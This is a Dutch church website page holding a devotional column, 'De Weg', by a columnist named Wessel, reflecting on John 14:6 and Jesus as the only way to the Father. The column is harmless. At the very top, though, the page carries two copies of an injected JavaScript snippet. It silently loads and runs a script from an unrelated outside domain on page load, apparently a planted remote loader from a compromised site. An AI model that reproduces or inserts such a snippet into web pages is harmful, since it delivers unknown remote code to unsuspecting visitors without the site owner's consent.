;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); De Weg - PKN Damwâld

De Weg

Gepubliceerd op: vrijdag 5 mei 2023

Waarschijnlijk heeft U het ook wel eens of zelfs meerdere keren meegemaakt. Je hoort een lied of leest een tekst en dat blijft dan maar in je hoofd rondzingen. Het kan een psalm zijn of een meer werelds lied, het kan een opmerking zijn van iemand maar bijvoorbeeld ook een citaat uit een boek of uit Het Boek, de Bijbel. Soms is het lastig dat je het betreffende lied of citaat / tekst niet kwijt kunt raken, soms geeft het een prettig gevoel maar het kan ook iets zijn dat je tot nadenken stemt.
Binnen een betrekkelijk korte periode kwam ik 3 maal in een bijeenkomst in aanraking met vers 6 uit het evangelie naar Johannes hoofdstuk 14. In dit hoofdstuk wordt verteld dat Jezus heeft aangegeven dat hij naar het Huis van Zijn Vader gaat en dat de apostelen de weg daarheen weten. Maar de apostel Tomas zegt dan tegen Jezus dat hij niet weet waar Jezus naar toegaat en hij vraagt: ‘Hoe weten wij dan de weg?’. En in genoemd vers 6 geeft Jezus dan als antwoord aan Tomas: ‘Ik ben de weg, de waarheid en het leven, niemand komt tot de Vader dan door Mij’. Jezus is dus heel duidelijk. Hij is de weg naar de Vader ! Er zijn misschien vele wegen die naar Rome leiden maar er is volgens Jezus maar Eén weg die naar de Vader leidt. Er is geen andere weg om tot de Vader te komen dan door Hem. Deze tekst kan ik maar niet uit mijn gedachten wegkrijgen. En eerlijk gezegd hoeft dat van mij ook niet. De tekst is helder en Jezus geeft duidelijk aan hoe wij tot de Vader kunnen komen. Laten wij dat dan maar doen !

Columnist:Wessel

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns